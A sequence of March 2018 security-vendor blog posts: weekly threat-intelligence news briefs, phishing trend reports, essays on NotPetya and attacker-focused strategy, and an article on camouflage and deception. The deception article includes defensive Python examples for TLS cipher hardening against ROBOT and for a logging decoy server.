There is no question that the security arms race is continuing to escalate. The bad actors are well-funded, organized and ambitious. Enterprise organizations must respond in kind, but must do so intelligently.

While an enterprise can never outsource its security responsibility, it can and should seek to leverage outside resources that can extend its capabilities in the most resource-efficient manner possible. As the fight between enterprises and those who wish to do them harm continues, enterprise leaders will need every advantage they can muster.

Copyright © Intellyx LLC. LookingGlass is an Intellyx client. Intellyx retains full editorial control over the content of this paper.

The post Elevating Your Security Posture with Threat-Intelligence-as-a-Service appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 27, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Technology

“Expedia subsidiary Orbitz today revealed hackers may have accessed personal information from about 880,000 payment cards. The business said an investigation showed that the breach may have occurred between Jan. 1, 2016 and Dec. 22, 2017 for its partner platform, and between Jan. 1, 2016 and June 22, 2016 for its consumer platform. Information such as names, phone numbers, email and billing addresses may have been accessed, the travel website operator said. It said its website, Orbitz.com, was not impacted. “To date, we do not have direct evidence that this personal information was actually taken from the platform and there has been no evidence of access to other types of personal information, including passport and travel itinerary information,” Orbitz said. The company said it has addressed the breach after it was discovered in March this year. Credit card issuer American Express said in a statement that the attack did not compromise its platforms.”

–Reuters

Energy

“Dozens of demonstrators were arrested and three police officers were injured during protests at the Kinder Morgan site in Burnaby this week. Mounties said at least a dozen people were arrested on Shellmont Street Tuesday, many of whom had breached a court-ordered injunction involving the Trans Mountain facility. The arrests came a day after 19 people were arrested at a similar protest, 13 of whom had breached the injunction. One male protester was arrested after locking himself to the front of an excavator being transported on the back of a truck. He was extracted from the lock and held in civil contempt of a court-ordered injunction. A woman was arrested after climbing on top of the same excavator and refusing to come down. She eventually did climb down after what RCMP described as “hours of negotiation.””

–CTV

Information Security Risk

“Facebook says it has suspended the account of Cambridge Analytica amid reports it harvested the profile information of millions of US voters without their permission. The company reportedly stole information from 50 million Facebook users’ profiles, to help them design software to predict and influence voters’ choices at the ballot box. Also suspended were the accounts of its parent organization, Strategic Communication Laboratories, as well as those of two University of Cambridge psychologists and a Canadian data analytics expert who worked with them. The premise of the collection was through the use of an app, which offered a personality prediction test, describing itself on Facebook as “a research app used by psychologists.” Some 270,000 people downloaded the app allowing researchers to access information such as the city listed on their profile, or content they had “liked.” However, the app also collected the information of the test-takers’ Facebook friends, leading to the accumulation of a data pool tens of millions-strong.”

–The Guardian

Operational Risk

“A new variant of the FakeBank Android malware includes the ability to intercept phone calls victims are making to their banks and redirect users to scammers. This new FakeBank variant is currently active in South Korea, researchers said. Experts found the FakeBank banking trojan inside 22 Android apps distributed via third-party app stores and via links shared on social media sites.”


The post Weekly Threat Intelligence Brief: March 27, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Camouflage & Deception: A New Approach to Threat Mitigation

Organizations face threats that range from mere annoyances to sophisticated attacks crafted by an adversary with intent and forethought about their objectives. The prevalence of exploit kits, malware, and botnet toolkits shared by bad actors across the Internet and Dark Net makes it easier for actors to build more sophisticated threats.

How can security teams disrupt adversarial activities more effectively?

It is no longer enough for our threat response to focus solely on detection and blocking. We need cyber defenses that will disrupt the threat activities of an adversary.

Security teams have adopted a multi-faceted security infrastructure consisting of firewalls, IDS/IPS, content-inspection, and behavioral analytics defense systems. This layered defense strategy provides protection for the majority of detectable threats that are found using a combination of signature-based and non-signature-based detection mechanisms.

An active defense posture builds on this foundation to disrupt threat activities of the adversary; it examines how an adversary may progress through a cyber kill chain and how we can impact the adversary, causing them to pivot to new TTPs or a different target entirely.

Figure 1: Typical actor activities during kill-chain progression

Increasing the time it takes for the adversary to progress through the kill-chain, the expertise required to launch a cyber attack, and ultimately the cost to execute should be additional security objectives.

Many solutions focus solely on one phase of the kill chain, such as detecting or blocking C2 communications. I recommend instead a broad-based approach in which disruptive cyber defense mechanisms can be applied across all aspects of the kill chain, guided by two questions: which phase of the kill chain are we disrupting, and which aspect of progression will have the most impact on the adversary?

Figure 2: Where disruptive techniques can be applied

There are two disruptive approaches to consider adding to your response strategy.

Camouflage: the act, means, or result of obscuring things to deceive an enemy by painting or screening objects so that they are lost to view in the background, or by making up objects that from a distance have the appearance of fortifications.

Deception: to mislead by a false appearance or statement.

Applying both of these techniques to a cyber defense strategy can help with:

  • Predicting Attacks
    • Gathering low-false-positive threat intelligence on adversary tactics, indicators, etc.
    • More easily understanding goals, motives, and intent
  • Detecting Activities
    • More advanced detection when other protections fail
    • Early alerting and notification to operations without impact to business-critical systems
  • Disrupting & Responding
    • Easily engaging with attackers and their TTPs
    • Easier reconnaissance of the attacks
    • Manipulating behaviors and interactions to confuse, delay, or interrupt the attacker’s activities
    • Increasing the cost, expertise required, and impact on the attacker

There are at least two areas to apply camouflage and deception activities:

  • Network-Based
    • Interact with TTPs within the network (e.g. routers, firewalls, proxies)
  • Network-Endpoint-Based
    • Interact with TTPs at the endpoint systems (e.g. laptop, mobile, servers)

Network-Based Camouflage: Camouflaging unpatched servers from vulnerability discovery

Many IT and security teams are unable to keep up with the continuous challenge of maintaining software patch levels on all servers (both external and internal). In some cases, there are business process impacts that must be considered before the team maintaining a server pushes an update to its operating system or application stack. These considerations necessarily slow the velocity of patching, and while those decisions are pending the servers may remain vulnerable to exploitation.

Network-based camouflage is another way to protect against certain types of vulnerabilities. An intermediary network system (for example, a proxy) is configured to obfuscate and camouflage the vulnerable service, based on threat intelligence about the vulnerabilities and the TTPs that may be used to exploit them.

For example, the ROBOT vulnerability, which arises from a server’s TLS cipher settings, can be camouflaged as shown in the diagram below:

Figure 3. ROBOT Vulnerability Camouflage
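How an intermediary can camouflage a backend’s ROBOT exposure, as an added example that is not LookingGlass code: ROBOT is a padding-oracle attack against RSA PKCS#1 v1.5 key exchange in TLS, so the intermediary’s TLS termination policy simply offers no RSA key-exchange suites, and a scanner probing for the weakness sees only the intermediary, never the backend’s cipher settings. The cipher strings and the Python `ssl`-based check are assumptions about how such an intermediary might be configured and audited.

```python
"""Hardened TLS termination policy for a camouflaging intermediary.

Added example (not LookingGlass code). Assumption: the intermediary in front
of an unpatched server terminates TLS itself, so a ROBOT probe only ever
negotiates with the intermediary's cipher policy. ROBOT needs a static RSA
key-exchange suite to be selectable; the policy below removes every such
suite (OpenSSL keyword kRSA) and keeps only forward-secret ECDHE AEAD suites.
"""
import ssl

# Cipher policy for the intermediary: forward-secret AEAD suites only.
# '!kRSA' strips static RSA key exchange, the surface a ROBOT probe looks for.
HARDENED_CIPHERS = "ECDHE+AESGCM:ECDHE+CHACHA20:!kRSA:!aNULL:!eNULL"

# Deliberately permissive string standing in for a legacy backend that still
# offers static-RSA suites such as AES256-GCM-SHA384 (constructed for contrast).
LEGACY_CIPHERS = "ALL:!aNULL:!eNULL"


def build_server_context(cipher_string: str) -> ssl.SSLContext:
    """Build a server-side TLS context with the given OpenSSL cipher string.

    TLS 1.0/1.1 are disabled. TLS 1.3 suites are not governed by the cipher
    string, and TLS 1.3 has no RSA key exchange at all, so they are safe here.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers(cipher_string)
    return ctx


def rsa_key_exchange_suites(ctx: ssl.SSLContext) -> list:
    """Names of the enabled suites that use static RSA key exchange.

    SSLContext.get_ciphers() reports the key-exchange algorithm under the
    'kea' key: 'kx-rsa' for static RSA, 'kx-ecdhe' for ECDHE, 'kx-any' for
    TLS 1.3 suites.
    """
    return sorted(c["name"] for c in ctx.get_ciphers() if c["kea"] == "kx-rsa")


def exposes_robot_surface(ctx: ssl.SSLContext) -> bool:
    """True if a handshake against this context could select an RSA-kx suite,
    i.e. the policy still presents the surface that ROBOT probes for."""
    return bool(rsa_key_exchange_suites(ctx))


if __name__ == "__main__":
    for label, ciphers in (("legacy backend", LEGACY_CIPHERS),
                           ("intermediary", HARDENED_CIPHERS)):
        ctx = build_server_context(ciphers)
        suites = rsa_key_exchange_suites(ctx)
        print(f"{label:15s} RSA-kx suites offered: {suites or 'none'} "
              f"-> ROBOT surface visible: {exposes_robot_surface(ctx)}")
```

Run the audit against the context your proxy actually loads; a backend that still offers RSA key exchange stays vulnerable on any path that bypasses the intermediary, so camouflage buys time for patching rather than replacing it.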

Network-Endpoint Deception Example: Server Decoys

In addition to camouflaging vulnerabilities on servers and endpoints, security teams can leverage deception techniques. This involves running decoy systems that impersonate legitimate systems on an organization’s network and act as an enticement to actors who may be attempting to breach the perimeter or may already have done so. The endpoint decoy can provide vital insight into the TTPs performed by those actors. As shown below, the decoys can be provisioned to return attractive results for an adversary to explore, so that they ultimately spend time considering the false information the decoy provides. This increases the time the adversary is under observation and can yield useful intelligence on their objectives and ultimate goal.

Figure 4. Endpoint System Decoy
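A minimal endpoint decoy of the kind described above, as an added example that is not LookingGlass code: it serves constructed bait, records every interaction as an alert annotated with how far the actor has progressed (probing, enumeration, collection), and tags each response so that fake data surfacing elsewhere can be traced back to whoever pulled it. The document names, secret key and addresses are constructed for the example.

```python
"""Endpoint decoy that serves tagged fake data and treats every touch as an alert.

Added example, not LookingGlass code. Assumptions: the decoy poses as an
internal document index that no legitimate user or process ever consults, so
any request to it is a high-fidelity signal; the file names and contents are
constructed bait; every response carries a per-interaction tag so that, if the
fake data later shows up elsewhere, it can be traced to the source that took it.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed bait: plausible names that invite a follow-up fetch.
FAKE_INDEX = ["q3-acquisition-targets.xlsx", "vpn-backup-credentials.txt",
              "payroll-2018.csv"]
FAKE_BODY = "placeholder content (decoy)"


@dataclass
class DecoyEvent:
    source: str    # who touched the decoy (IP, hostname or session id)
    path: str      # what they asked for
    stage: str     # 'probing', 'enumeration' or 'collection'
    severity: str  # escalates as the actor moves from listing to fetching
    tag: str       # identifier embedded in the response for later tracing


class ServerDecoy:
    def __init__(self, secret: bytes):
        self._secret = secret
        self.events: List[DecoyEvent] = []
        self._by_tag: Dict[str, DecoyEvent] = {}

    def _make_tag(self, source: str, path: str) -> str:
        """Keyed, truncated HMAC over source, path and sequence number.

        Keying means an actor cannot forge or predict tags; the sequence
        number keeps repeated identical requests distinguishable."""
        msg = f"{source}|{path}|{len(self.events)}".encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()[:12]

    def handle(self, source: str, path: str) -> Tuple[str, DecoyEvent]:
        """Answer a request with bait and record it as a detection event."""
        tag = self._make_tag(source, path)
        name = path[len("/doc/"):] if path.startswith("/doc/") else None
        if path == "/index":
            stage, severity = "enumeration", "medium"
            body = "\n".join(f"{n}  ref:{tag}" for n in FAKE_INDEX)
        elif name in FAKE_INDEX:
            stage, severity = "collection", "high"
            body = f"CONFIDENTIAL {name} ref:{tag}\n{FAKE_BODY}"
        else:
            stage, severity = "probing", "low"
            body = "404 Not Found"
        event = DecoyEvent(source, path, stage, severity, tag)
        self.events.append(event)
        self._by_tag[tag] = event
        return body, event

    def trace(self, tag: str) -> Optional[DecoyEvent]:
        """Resolve a tag seen elsewhere (a log, a paste, an e-mail) to its origin."""
        return self._by_tag.get(tag)

    def progression(self, source: str) -> List[str]:
        """Stages a source has reached, in order, e.g. ['enumeration', 'collection']."""
        seen: List[str] = []
        for e in self.events:
            if e.source == source and e.stage not in seen:
                seen.append(e.stage)
        return seen


if __name__ == "__main__":
    decoy = ServerDecoy(secret=b"constructed-decoy-secret")
    decoy.handle("10.0.0.5", "/index")
    decoy.handle("10.0.0.5", "/doc/vpn-backup-credentials.txt")
    for e in decoy.events:
        print(f"ALERT {e.severity:6s} {e.source} {e.stage:12s} {e.path} tag={e.tag}")
    print("progression:", decoy.progression("10.0.0.5"))
```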

There are other defense techniques that can leverage these two capabilities in useful and interesting ways and also extend the camouflage and deception options available to security teams. If you are considering threat responses beyond traditional mitigation steps in your environment, I hope you found this background useful. To learn more about LookingGlass’ use of camouflage and deception techniques for threat mitigation, please contact me at @tweet_a_t or @LG_Cyber.

The post Camouflage & Deception: A New Approach to Threat Mitigation appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 20, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from March 11 – 17, 2018.

This week, we saw a decrease in overall phishing activity – 25% – for the top 20 brands we monitor, with the largest increase in activity coming from Computer Hardware and the largest decrease from Internet Search & Navigation Services. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Computer Hardware (>80%)
  2. Computer Software (>55%)
  3. Electronic Payment Services (>5%)

The top 5 industries that saw a decrease in phishing activity this week:

  1. Internet Search & Navigation Services (>50%)
  2. Telecommunications (>45%)
  3. Storage & Systems Management Software (>25%)
  4. Banking (>20%)
  5. Social Networking (>10%)

By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.


The post Weekly Phishing Report: March 20, 2018 appeared first on LookingGlass Cyber Solutions Inc..

NotPetya’s Challenge? Re-Prioritize Your Information Security

The damaging wiper attack last June carried a clear message for global organizations: you need to re-prioritize your security spending.

About a month after the NotPetya malware outbreak in late June 2017, I was on the phone with someone I’ll call “Stacy,” who worked for a freight forwarding firm in the U.S. At the time we spoke, Stacy was desperate to locate a very important piece of equipment known as a “blowout preventer” (or BOP) that her company had contracted to ship to a customer in Norway for use on one of the offshore oil platforms there. At the time, the BOP had gone missing. That is surprising, if you’ve ever seen one. They’re massive pieces of equipment that get trucked around on 40-foot flatbed trucks.

Stacy knew where her shipment was: sitting on the dock in Bremerhaven, Germany, where it had landed right around the time NotPetya began spreading on June 27th. The problem was that her shipping company, A.P. Møller-Maersk, didn’t. Instead, it was scrambling to respond to the attack.

We now know that, behind the scenes, Maersk’s IT staff mounted a heroic effort: reinstalling over 4,000 servers, 45,000 PCs, and 2,500 applications over the course of ten days in late June and early July 2017, according to statements by that company’s CEO at the World Economic Forum in Davos in January. The virus cost Maersk more than $300 million to recover. But the effects of the crippling attack rippled out to companies large and small, as well. Stacy’s firm had to spend money having the blowout preventer surveyed in Bremerhaven to make sure it was not damaged by sitting on the dock. Firms that were lined up to transport the part to the offshore rig in late June also lost business. The oil rig the part was destined for was kept idle waiting for the part’s arrival. The cost to the global economy is unknown – but is certain to total billions – if not hundreds of billions of dollars.

What is the moral of this story for executives at firms like Stacy’s? Not falling for the next NotPetya means figuring out what weaknesses NotPetya exploited and addressing them. But it also requires firms to stay ahead of threats so that they can anticipate new attacks, not merely respond to them.

What were NotPetya’s lessons? Here are some to consider:

Reimagine your risk

Conventional wisdom has been that cyber attacks – though disruptive – are manageable. Outbreaks like NotPetya and WannaCry challenge that established wisdom.

Both attacks were not merely disruptive but destructive: wiping out systems they infected, rather than simply hijacking them or holding their data ransom. The operational impact on the affected companies was severe. Maersk, for example, was forced to revert to pen and paper to run its business for days while it rebuilt its IT systems from scratch.

“Imagine a company where a ship with 20,000 containers would enter a port every 15 minutes, and for ten days you have no IT,” CEO Snabe said at Davos.

The lesson for your firm is clear: you need to reimagine the risks to your firm and its operations. In addition to formulating clear contingency plans for major outbreaks (robust, offsite backup and recovery plans certainly beat pen and paper), your firm should re-evaluate its assumptions about worst case scenarios as it weighs current and future information security investments and add some zeros to the “cost of doing nothing.”

Think holistically about threats to your organization

Maersk wasn’t the only global firm affected by NotPetya. FedEx suffered by way of its TNT Express acquisition. US-based Mondelez candy and the drug giant Merck were also hit hard by the virus. What’s interesting is that none of these firms were intended targets of NotPetya. Rather: they were collateral damage of an attack that experts believe was a Russian-backed campaign designed to disrupt Ukraine’s government and economy.

The moral? Instability in one part of the world (say: the rolling cyber conflict between Russia and Ukraine) can easily spill over national borders in ways that are unpredictable. Maersk’s CEO called his company an “accidental victim” of a nation-state attack. And that’s just about right. The consequence of this is that organizations cannot be too narrowly focused on known threats.

Quality threat intelligence from a reliable provider can help, but you also need to be able to integrate that threat intelligence into your IT operations and information security workflow. An example: NotPetya spread rapidly within corporate networks because it was married to powerful, Windows-based exploits known as “Eternal Romance” and “Eternal Blue.” Threat intelligence noting that both nation-state actors and cyber criminal “ransomware” groups were actively leveraging those exploits should have escalated patching and remediation efforts internally. Better patching would have stopped or limited the spread of NotPetya, greatly reducing its operational impact.

Prioritize third party risk

A clear lesson of NotPetya is that third party risk is real and that companies and Boards of Directors need to pay a lot more attention to it.

How so? One of NotPetya’s initial avenues of infection was via a Ukrainian maker of financial software, M.E. Docs. That company, which had been compromised by hackers, unwittingly distributed a signed software update that installed the malware. More than 2,000 firms in Ukraine alone found themselves infected.

Should the presence of an application by a Ukrainian firm on your network raise alarms? Possibly. Especially when coupled with threat intelligence about similar efforts by nation-state actors to infiltrate and disrupt Ukrainian firms. A more holistic approach would be to assess the many software and hardware supply chains your firm relies on and the risk and possible consequences of any supply chain attack, then introduce processes that mitigate such risks internally.

Paul Roberts is the Editor in Chief at The Security Ledger. You can follow him online at: @paulfroberts and @securityledger.

The post NotPetya’s Challenge? Re-Prioritize Your Information Security appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 13, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Technology

“Japanese game developer Nippon Ichi Software (NIS) has suffered a major data breach and is offering customers, er, $5 as compensation. In an email sent to customers last week, NIS admitted that its American arm had fallen victim to a breach compromising the personal and financial data of its online customers. While it’s unclear how many customers have been affected, NIS has confirmed that the breach took place between 3 January and 26 February and affected two of its online stores, which have since been taken offline. However, during that time frame, hackers were able to make off with customers’ payment card details, email address and address information, although NIS has said that those who ordered using PayPal have not been affected. NIS noted that it does not store customers’ payment card information and that user accounts are used “primarily to track past orders and gain rewards points. Data for past orders is stored securely and will only show the last four digits of a credit card, and will not show the CVV security code or expiration date,” NIS said. NIS is recommending, naturally, that all customers change their passwords immediately and check their card statements for any suspicious activity.”

–The Inquirer

Energy

“A new analysis of industrial control components used by utilities indicated 61 percent of them could cause “severe operational impact” if affected by a cyberattack. The research from cybersecurity firm Dragos, as reported by The Daily Beast, looked at 163 new security vulnerabilities that came to light last year. So far, 72 percent of the vulnerabilities have no known way to be closed. However, only 15 percent of the vulnerabilities are accessible from the outside, with the rest requiring the attacker to have already gained access to a plant operations network. The majority of the security holes are in equipment that is already tightly secured in other ways. The report by Dragos, which covers an array of potential cybersecurity threats worldwide, notes Russian hackers caused an electrical outage in Ukraine over a year ago, and North Korea may be looking to do the same in the United States. Currently, malware known as Covellite is attacking electric utilities in the United States, Europe and parts of east Asia with spear-phishing attacks.”

–Power Engineering

Operational Risk

“A security firm, the Romanian Police, and Europol allegedly gained access to the GandCrab Ransomware’s Command & Control servers, which allowed them to recover some of the victims’ decryption keys. This allowed researchers to release a tool that could decrypt some victims’ files. After this breach, the GandCrab developers stated that they would release a second version of GandCrab that included a more secure command & control server in order to prevent a similar compromise in the future. Researchers have since discovered that GandCrab version 2 was released, which contains changes that supposedly make it more secure and allow us to differentiate it from the original version.”

–Bleeping Computer

Reputational Risk

“Intel has issued updated microcode to help safeguard its Broadwell and Haswell chips from the Spectre Variant 2 security exploits. According to Intel documents, an array of its older processors, including the Broadwell Xeon E3, Broadwell U/Y, Haswell H,S and Haswell Xeon E3 platforms, have now been fixed and are available to hardware partners. The company’s new microcode updates come a week after Intel also issued updates for its newer chip platforms like Kaby Lake, Coffee Lake and Skylake. The Spectre and Meltdown defects, which account for three variants of a side-channel analysis security issue in server and desktop processors, could potentially allow hackers to access users’ protected data. Meltdown breaks down the mechanism keeping applications from accessing arbitrary system memory, while Spectre tricks other applications into accessing arbitrary locations in their memory. According to Intel’s documentation, the Spectre fixes for Sandy Bridge and Ivy Bridge are still in beta and are being tested by hardware partners.”

–BBC

The post Weekly Threat Intelligence Brief: March 13, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 12, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from March 4 – 11, 2018.

This week, we saw a large increase in overall phishing activity – 50% – for the top 20 brands we monitor, with the largest increase in activity coming from Internet Search & Navigation Services and the largest decrease from Computer Hardware. Only two industries saw decreases in phishing this week.

The top 5 industries that saw an increase in phishing activity this week:

  1. Internet Search & Navigation Services (>180%)
  2. Telecommunications (>125%)
  3. Storage & Systems Management Software (>65%)
  4. Computer Software (>45%)
  5. eCommerce (>30%)

The top 2 industries that saw a decrease in phishing activity this week:

  1. Computer Hardware (>80%)
  2. Electronic Payment Systems (>15%)

By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.


The post Weekly Phishing Report: March 12, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Thwart Cyber Attackers by Inverting Your Strategy

When it comes to your organization’s cybersecurity, there is no “one size fits all” solution. In the face of today’s dynamic threats – bad actors constantly find new and innovative ways to circumvent existing security apparatuses – many organizations are struggling to get ahead of an attack.

Yes, the more you know – what adversaries are operating in the space, the techniques and procedures leveraged by them, and the tools and vulnerabilities used and exploited to ensure that their efforts yield success – the better positioned you are to defend your assets. However, have you ever thought about approaching this from what we call an “effects-based” approach – looking at the end game of an action as your starting point? By doing so, you’ll better understand the larger cyber threat landscape, and where your organization falls within it.

Initially a military concept, Effects-Based Operations (EBOs) systemically evaluate incidents (such as a major hack) through the lens of strategic centers of gravity — leadership, key essentials, infrastructure, population and military forces. EBOs look at the totality of the system being acted upon and determine the most effective means to achieve the desired end state.

It puts the attackers’ “bottom line” – in this case, their intended consequence – upfront with the purpose of analytically working back from that point to the perpetrator rather than the other way around. This allows network defenders to investigate how current tactics employed by hackers would work against their organization. In addition, security teams can explore other venues not yet compromised (but could be) to identify future threat trending.

Toward this end, security teams can look at the impact of cyber incidents within their respective industries and verticals to begin understanding how and why hostile actors are implementing specific attacks – and what they may look for in targeting their organization.

Recognizing the latter (i.e. data exfiltration or disruptive attacks), rather than focusing on the means and manners in which these objectives are carried out, enables network defenders to identify the causal linkages between such incidents, adding to their core knowledge base of attackers and their operations.

Examples of effects-based trends include infrastructure impedance such as those resulting from distributed denial-of-service (DDoS) attacks; influence schemes (e.g. the suspected Russian hacking of the Democratic National Convention and state voter registration systems); data aggregation typically associated with cyber espionage; “false flag” operations in which adversaries purposefully leave data to implicate another source; and cyber-informed kinetics.

In a domain that continues to favor attackers, network defenders must find any advantage they can to compete against an adversary. An Effects-Based Operation for cybersecurity complements conventional strategies. With this, security teams sift through the volume of looming threats, identifying those that are most pertinent to their enterprise’s interests. This prepares them not only for the near term, but the future as well.

At LookingGlass, we provide clients with a suite of products and services that deliver unified threat protection against sophisticated cyber attacks. If you’d like to learn more about what we can do for your organization, please contact us.

The post Thwart Cyber Attackers by Inverting Your Strategy appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 7, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Defense

“According to a Quick Heal report released on Monday, in 2017 their Security Labs detected over 930 million Windows malware that targeted individuals and businesses. The year was dominated by several exploits leaked by the hacker group “The Shadow Brokers” such as EternalBlue, EternalChampion, EternalRomance and EternalScholar which were responsible for advanced ransomware campaigns such as WannaCry and NotPetya, and a few cryptocurrency mining campaigns. Sanjay Katkar, Joint Managing Director and Chief Technology Officer of Quick Heal Technologies Limited said that the problem of ransomware is going to exacerbate because of growing availability of exploit kits and ransomware-as-a-service.”

–ET-CIO

Information Security Risk

“A newly uncovered form of Android malware secretly steals sensitive data from infected devices – including full audio recordings of phone calls – and stores it in cloud storage accounts. An invasive form of spyware, RedDrop harvests information from the device, including live recordings of its surroundings, user data including files, photos, contacts, notes, device data and information about saved Wi-Fi networks and nearby hotspots. The first time the malware was seen, it was being distributed via a Chinese language adult content app called CuteActress, but others target those speaking English and other languages. “This is very much a global operation,” a security researcher reported.”

–ZDNet

Operational Risk

“An endpoint security firm has spotted a massive campaign that exploits a recently patched Adobe Flash Player vulnerability to deliver malware. The flaw in question, CVE-2018-4878, is a use-after-free bug that Adobe patched on February 6, following reports that North Korean hackers had been exploiting the vulnerability in attacks aimed at South Korea. The threat group, tracked as APT37, Reaper, Group123 and ScarCruft, has been expanding the scope and sophistication of its campaigns. After Adobe patched the security hole, which allows remote code execution, other malicious actors started looking into ways to exploit CVE-2018-4878.”

–Security Week


The post Weekly Threat Intelligence Brief: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 7, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from February 25 – March 3, 2018.

This week, we saw a large decrease in overall phishing activity – 39% – for the top 20 brands we monitor, with the largest increase in activity coming from Telecommunications and the largest decrease from eCommerce. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Telecommunications (>40%)
  2. Internet Information Services (>30%)
  3. Computer Hardware (>1%)

The top 5 industries that saw a decrease in phishing activity this week:

  1. eCommerce (>62%)
  2. Internet Search & Navigation Services (>60%)
  3. Computer Software (>45%)
  4. Storage Systems & Management Software (>35%)
  5. Electronic Payment Systems (>28%)

By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.


The post Weekly Phishing Report: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..